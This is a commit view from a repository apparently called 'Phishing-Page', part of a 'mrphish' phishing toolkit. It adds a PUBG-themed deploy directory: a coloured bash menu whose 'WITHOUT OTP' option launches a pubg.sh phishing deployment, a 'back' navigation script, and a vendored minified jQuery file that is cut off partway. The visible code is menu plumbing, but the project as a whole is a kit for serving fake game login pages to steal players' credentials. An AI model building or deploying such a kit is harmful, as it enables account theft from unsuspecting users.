Projects STRLCPY Phishing-Page Commits f06d79f5
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
Showing first 78 files as there are too many
  • ■ ■ ■ ■ ■ ■
    pubg/back
     1 +cd $HOME/mrphish/core/deploys/socialmedia/
     2 +bash menu
     3 + 
  • ■ ■ ■ ■ ■ ■
    pubg/menu
     1 + 
     2 +clear
     3 +echo -e "
     4 + 
     5 + ____ _ _ ____ ____
     6 + (_ _)( \/ )( _ \( __)
     7 + )( ) / ) __/ ) _)
     8 + (__) (__/ (__) (____)"
     9 + 
     10 + echo
     11 + 
     12 +echo -e "\e[96m |-----------------------------------------------------|"
     13 +echo -e "\e[96m |-------------------\e[92mSELECT OPTIONS\e[96m--------------------|"
     14 +echo -e "\e[96m |-----------------------------------------------------|"
     15 +echo -e "\e[96m | |"
     16 +echo -e "\e[96m | |"
     17 +echo -e "\e[96m | [\e[92m1\e[96m]==> WITHOUT OTP |"
     18 +echo -e "\e[96m | |"
     19 +echo -e "\e[96m | [\e[92m2\e[96m]==> BACK |"
     20 +echo -e "\e[96m | |"
     21 +echo -e "\e[96m | |"
     22 +echo -e "\e[96m |-----------------------------------------------------|"
     23 +echo -e "\e[96m |---------------------\e[91mPUBG\e[96m----------------------------|"
     24 +echo -e "\e[96m |-----------------------------------------------------|"
     25 +sleep 0.5
     26 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] SELECT OPTION: \e[0m' option
     27 +if [[ $option == 1 || $option == 01 ]]; then
     28 +echo
     29 +cd $HOME/mrphish/core/deploys/gaming/pubg/notp
     30 +bash pubg.sh
     31 +echo
     32 +elif [[ $option == 2 || $option == 02 ]]; then
     33 +bash back
     34 +elif [[ $option == 0 ]]; then
     35 +clear
     36 +echo
     37 +printf " \e[1;96m Have A Good Day ........! \e[0m\n"
     38 +echo
     39 +sleep 3.0
     40 +exit 3
     41 +else
     42 +printf " \e[1;96m [!] Invalid option!\e[0m\n"
     43 +sleep 4.0
     44 +bash menu.sh
     45 +fi
     46 + 
  • ■ ■ ■ ■ ■
    pubg/notp/ajax/libs/jquery/2-1-1/jquery.min.js
     1 +/*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
     2 +!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){return!n.isArray(a)&&a-parseFloat(a)>=0},isPlainObject:function(a){return"object"!==n.type(a)||a.nodeType||n.isWindow(a)?!1:a.constructor&&!j.call(a.constructor.prototype,"isPrototypeOf")?!1:!0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElement("script"),b.text=a,l.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:g.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function s(a){var b=a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+-new Date,v=a.document,w=0,x=0,y=gb(),z=gb(),A=gb(),B=function(a,b){return a===b&&(l=!0),0},C="undefined",D=1<<31,E={}.hasOwnProperty,F=[],G=F.pop,H=F.push,I=F.push,J=F.slice,K=F.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},L="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",N="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=N.replace("w","w#"),P="\\["+M+"*("+N+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+O+"))|)"+M+"*\\]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),V=new RegExp(Q),W=new RegExp("^"+O+"$"),X={ID:new RegExp("^#("+N+")"),CLASS:new RegExp("^\\.("+N+")"),TAG:new RegExp("^("+N.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+Q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+L+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{I.apply(F=J.call(v.childNodes),v.childNodes),F[v.childNodes.length].nodeType}catch(eb){I={apply:F.length?function(a,b){H.apply(a,J.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if(p&&!e){if(f=_.exec(a))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return I.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return I.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=9===k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+qb(o[l]);w=ab.test(a)&&ob(b.parentNode)||b,x=o.join(",")}if(x)try{return I.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function gb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function hb(a){return a[u]=!0,a}function ib(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function lb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function nb(a){return hb(function(b){return b=+b,hb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function ob(a){return a&&typeof a.getElementsByTagName!==C&&a}c=fb.support={},f=fb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fb.setDocument=function(a){var b,e=a?a.ownerDocument||a:v,g=e.defaultView;return e!==n&&9===e.nodeType&&e.documentElement?(n=e,o=e.documentElement,p=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){m()},!1):g.attachEvent&&g.attachEvent("onunload",function(){m()})),c.attributes=ib(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ib(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="<div class='a'></div><div class='a i'></div>",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=ib(function(a){return o.appendChild(a).id=u,!e.getElementsByName||!e.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==C&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c=typeof a.getAttributeNode!==C&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==C?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==C&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(e.querySelectorAll))&&(ib(function(a){a.innerHTML="<select msallowclip=''><option selected=''></option></select>",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+M+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ib(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",Q)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],i=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:k?K.call(k,a)-K.call(k,b):0;if(f===g)return kb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?kb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},e):n},fb.matches=function(a,b){return fb(a,null,null,b)},fb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fb(b,n,null,[a]).length>0},fb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&E.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fb.selectors={cacheLength:50,createPseudo:hb,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+M+")"+a+"("+M+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==C&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?hb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=K.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:hb(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:hb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:hb(function(a){return W.test(a||"")||fb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:nb(function(){return[0]}),last:nb(function(a,b){return[b-1]}),eq:nb(function(a,b,c){return[0>c?c+b:c]}),even:nb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:nb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:nb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:nb(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=lb(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=mb(b);function pb(){}pb.prototype=d.filters=d.pseudos,d.setFilters=new pb,g=fb.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=S.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=T.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(R," ")}),h=h.slice(c.length));for(g in d.filter)!(e=X[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?fb.error(a):z(a,i).slice(0)};function qb(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function rb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function sb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function tb(a,b,c){for(var d=0,e=b.length;e>d;d++)fb(a,b[d],c);return c}function ub(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function vb(a,b,c,d,e,f){return d&&!d[u]&&(d=vb(d)),e&&!e[u]&&(e=vb(e,f)),hb(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||tb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ub(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ub(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?K.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ub(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):I.apply(g,r)})}function wb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=rb(function(a){return a===b},h,!0),l=rb(function(a){return K.call(b,a)>-1},h,!0),m=[function(a,c,d){return!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>i;i++)if(c=d.relative[a[i].type])m=[rb(sb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return vb(i>1&&sb(m),i>1&&qb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&wb(a.slice(i,e)),f>e&&wb(a=a.slice(e)),f>e&&qb(a))}m.push(c)}return sb(m)}function xb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=G.call(i));s=ub(s)}I.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&fb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?hb(f):f}return h=fb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xb(e,d)),f.selector=a}return f},i=fb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&ob(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qb(j),!a)return I.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&ob(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ib(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ib(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||jb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ib(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||jb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ib(function(a){return null==a.getAttribute("disabled")})||jb(L,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fb}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=n.expr.match.needsContext,v=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,w=/^.[^:#\[\.,]*$/;function x(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(w.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return g.call(b,a)>=0!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=this.length,d=[],e=this;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;c>b;b++)if(n.contains(e[b],this))return!0}));for(b=0;c>b;b++)n.find(a,e[b],d);return d=this.pushStack(c>1?n.unique(d):d),d.selector=this.selector?this.selector+" "+a:a,d},filter:function(a){return this.pushStack(x(this,a||[],!1))},not:function(a){return this.pushStack(x(this,a||[],!0))},is:function(a){return!!x(this,"string"==typeof a&&u.test(a)?n(a):a||[],!1).length}});var y,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=n.fn.init=function(a,b){var c,d;if(!a)return 